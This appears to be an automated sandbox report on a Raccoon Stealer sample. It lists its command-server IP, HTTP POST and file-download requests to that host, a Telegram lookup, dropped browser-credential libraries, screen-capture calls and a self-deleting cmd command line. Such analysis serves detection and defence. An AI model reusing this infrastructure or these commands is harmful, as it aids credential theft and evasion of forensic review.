54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150

Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/
Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/)
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/0082491d8ce92dde3db733700e3efad352687de3
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca04822
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca048222nR5E
Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/L
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/w;
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp, nssckbi.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://ocsp.accv.es0
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: 8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: 8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: 8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: nssckbi.dll.0.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8aAG42oIjb.exe, 00000000.00000003.665168634.0000000002C48000.00000004.00000001.sdmp, 8aAG42oIjb.exe, 00000000.00000003.665151353.0000000002C43000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 8aAG42oIjb.exe, 00000000.00000003.665151353.0000000002C43000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/agryb
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/agrybirdsgamerept
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: 8aAG42oIjb.exe, 00000000.00000003.672455258.0000000002C3F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 8aAG42oIjb.exe, 00000000.00000003.672455258.0000000002C3F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150

Source: unknown

DNS traffic detected: queries for: t.me

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: GET //l/f/p5H3KXwB3dP17SpzXqG4/0082491d8ce92dde3db733700e3efad352687de3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca04822 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

0_2_0042C157

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.659119952.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.674067230.0000000002150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8aAG42oIjb.exe PID: 3124, type: MEMORYSTR

Source: 8aAG42oIjb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040E139	0_2_0040E139
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0043E2E4	0_2_0043E2E4
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0042A2F9	0_2_0042A2F9
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0043628C	0_2_0043628C
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0042C383	0_2_0042C383
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00410648	0_2_00410648
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004206DD	0_2_004206DD
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040CF54	0_2_0040CF54
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004210B1	0_2_004210B1
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040F2E6	0_2_0040F2E6
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004373C6	0_2_004373C6
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040D684	0_2_0040D684
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00437819	0_2_00437819
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0041FD36	0_2_0041FD36
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040BF59	0_2_0040BF59
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0041E014	0_2_0041E014
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0042E110	0_2_0042E110
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0044A480	0_2_0044A480
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0045A4BD	0_2_0045A4BD
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004484BA	0_2_004484BA
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0045A5DD	0_2_0045A5DD
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0046475B	0_2_0046475B
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004187EC	0_2_004187EC
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0041E857	0_2_0041E857
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0041EBE9	0_2_0041EBE9
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00422D2B	0_2_00422D2B
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0042AE7B	0_2_0042AE7B
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00418F0B	0_2_00418F0B
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00434FE3	0_2_00434FE3
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00442F90	0_2_00442F90

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: String function: 0044F0F9 appears 44 times
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: String function: 00467790 appears 110 times
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: String function: 00440940 appears 47 times

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: 8aAG42oIjb.exe, 00000000.00000002.674350522.000000006E512000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs 8aAG42oIjb.exe
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll8 vs 8aAG42oIjb.exe
Source: 8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 8aAG42oIjb.exe
Source: 8aAG42oIjb.exe, 00000000.00000002.674532468.000000006E66B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs 8aAG42oIjb.exe

Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8aAG42oIjb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: sqlite3.dll.0.dr

Static PE information: Number of sections : 18 > 10

Source: 8aAG42oIjb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 8aAG42oIjb.exe	Virustotal: Detection: 32%
Source: 8aAG42oIjb.exe	ReversingLabs: Detection: 57%

Source: 8aAG42oIjb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8aAG42oIjb.exe 'C:\Users\user\Desktop\8aAG42oIjb.exe'
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\8aAG42oIjb.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\8aAG42oIjb.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK	Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/67@1/2

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

0_2_0042A224

Source: softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
